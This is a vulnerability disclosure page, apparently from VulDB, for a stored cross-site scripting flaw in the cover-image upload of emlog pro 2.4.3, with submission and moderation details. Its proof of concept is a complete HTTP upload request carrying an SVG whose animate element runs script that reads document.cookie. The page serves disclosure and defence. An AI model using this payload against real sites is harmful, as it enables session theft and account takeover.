Submit #468753: emlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)info

Titelemlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)
BeschreibungSummary An XSS vulnerability has been discovered in emlog pro 2.4.3. The vulnerability stems from the fact that /admin/article.php does not filter malicious SVG files. This vulnerability allows an attacker with content editing permissions to exploit the system by uploading an SVG file containing malicious XML code as the cover image for an article. Details The vulnerability exists in the article cover image upload functionality. Attackers can upload an SVG file that contains malicious XML code. POC POST /admin/article.php?action=upload_cover HTTP/1.1 Host: target-ip Content-Length: 1116 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBXHN1jTPmYb3jbAq Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryBXHN1jTPmYb3jbAq Content-Disposition: form-data; name="image"; filename="alert.svg" Content-Type: image/svg+xml <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 128 128"> <path fill="#D26383" d="M115.4 30.7L67.1 2.9c-.8-.5-1.9-.7-3.1-.7-1.2 0-2.3.3-3.1.7l-48 27.9c-1.7 1-2.9 3.5-2.9 5.4v55.7c0 1.1.2 2.4 1 3.5l106.8-62c-.6-1.2-1.5-2.1-2.4-2.7z" /> <path fill="#9C033A" d="M10.7 95.3c.5.8 1.2 1.5 1.9 1.9l48.2 27.9c.8.5 1.9.7 3.1.7 1.2 0 2.3-.3 3.1-.7l48-27.9c1.7-1 2.9-3.5 2.9-5.4V36.1c0-.9-.1-1.9-.6-2.8l-106.6 62z" /> <path fill="#fff" d="M85.3 76.1C81.1 83.5 73.1 88.5 64 88.5c-13.5 0-24.5-11-24.5-24.5s11-24.5 24.5-24.5c9.1 0 17.1 5 21.3 12.5l13-7.5c-6.8-11.9-19.6-20-34.3-20-21.8 0-39.5 17.7-39.5 39.5s17.7 39.5 39.5 39.5c14.6 0 27.4-8 34.2-19.8l-12.9-7.6z" /> <path d="M82.1 61.8h5.2v-5.3h4.4v5.3H97v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4zm18.5 0h5.2v-5.3h4.4v5.3h5.3v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4z" fill="#fff" /> <animate onbegin="alert(document.cookie)"></animate> </svg> ------WebKitFormBoundaryBXHN1jTPmYb3jbAq--
Quelle⚠️ https://github.com/emlog/emlog/issues/312
Benutzer
 jiashenghe (UID 39445)
Einreichung25.12.2024 07:38 (vor 1 Jahr)
Moderieren04.01.2025 10:53 (10 days later)
StatusAkzeptiert
VulDB Eintrag290214 [Emlog Pro bis 2.4.3 Cover Upload article.php?action=upload_cover image Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!